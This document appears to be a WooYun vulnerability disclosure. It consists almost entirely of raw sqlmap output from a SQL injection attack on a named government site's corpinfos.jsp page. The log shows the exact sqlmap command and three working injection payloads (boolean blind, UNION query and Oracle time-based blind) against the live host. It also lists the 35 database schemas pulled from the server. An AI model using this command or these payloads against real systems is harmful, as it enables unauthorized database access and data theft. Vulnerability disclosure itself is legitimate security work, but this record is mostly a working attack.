WooYun.org

root@kali:~# sqlmap -u "http://rzpt.smesd.gov.cn/corpinfos.jsp?id=9EB1A84C78AF4EEA9A56924632B594BD*" --level 2 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150401}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:28:25
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] 
[23:28:26] [INFO] resuming back-end DBMS 'oracle' 
[23:28:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://rzpt.smesd.gov.cn:80/corpinfos.jsp?id=9EB1A84C78AF4EEA9A56924632B594BD' AND 9081=9081 AND 'rtgM'='rtgM
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: http://rzpt.smesd.gov.cn:80/corpinfos.jsp?id=-7662' UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113)||CHR(77)||CHR(89)||CHR(73)||CHR(89)||CHR(112)||CHR(69)||CHR(104)||CHR(69)||CHR(81)||CHR(81)||CHR(113)||CHR(106)||CHR(112)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://rzpt.smesd.gov.cn:80/corpinfos.jsp?id=9EB1A84C78AF4EEA9A56924632B594BD' AND 7227=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(84)||CHR(90)||CHR(114),5) AND 'eIFp'='eIFp
---
[23:28:27] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[23:28:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[23:28:27] [INFO] fetching database (schema) names
[23:28:27] [INFO] the SQL query used returns 35 entries
[23:28:27] [INFO] retrieved: APEX_030200
[23:28:28] [INFO] retrieved: CTXSYS
[23:28:28] [INFO] retrieved: CYJQ
[23:28:29] [INFO] retrieved: DAREWIN
[23:28:29] [INFO] retrieved: DBSNMP
[23:28:30] [INFO] retrieved: ERONGE_DBA
[23:28:30] [INFO] retrieved: EXFSYS
[23:28:31] [INFO] retrieved: FLOWS_030000
[23:28:31] [INFO] retrieved: FLOWS_FILES
[23:28:31] [INFO] retrieved: HR
[23:28:32] [INFO] retrieved: IX
[23:28:33] [INFO] retrieved: LINQU
[23:28:33] [INFO] retrieved: MDSYS
[23:28:33] [INFO] retrieved: OE
[23:28:34] [INFO] retrieved: OLAPSYS
[23:28:34] [INFO] retrieved: ORDDATA
[23:28:35] [INFO] retrieved: ORDSYS
[23:28:35] [INFO] retrieved: OUTLN
[23:28:36] [INFO] retrieved: PM
[23:28:36] [INFO] retrieved: SCOTT
[23:28:36] [INFO] retrieved: SDSJZX_DBA
[23:28:37] [INFO] retrieved: SD_T
[23:28:37] [INFO] retrieved: SH
[23:28:38] [INFO] retrieved: SIB_SAAS
[23:28:38] [INFO] retrieved: SJZX_DBA
[23:28:39] [INFO] retrieved: SXXD
[23:28:39] [INFO] retrieved: SYS
[23:28:39] [INFO] retrieved: SYSMAN
[23:28:40] [INFO] retrieved: SYSTEM
[23:28:40] [INFO] retrieved: TSMSYS
[23:28:41] [INFO] retrieved: WKSYS
[23:28:41] [INFO] retrieved: WK_TEST
[23:28:41] [INFO] retrieved: WMSYS
[23:28:42] [INFO] retrieved: XDB
[23:28:42] [INFO] retrieved: XXFW
available databases [35]:                                                                                                                            
[*] APEX_030200
[*] CTXSYS
[*] CYJQ
[*] DAREWIN
[*] DBSNMP
[*] ERONGE_DBA
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] HR
[*] IX
[*] LINQU
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SD_T
[*] SDSJZX_DBA
[*] SH
[*] SIB_SAAS
[*] SJZX_DBA
[*] SXXD
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XXFW
[23:28:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/rzpt.smesd.gov.cn'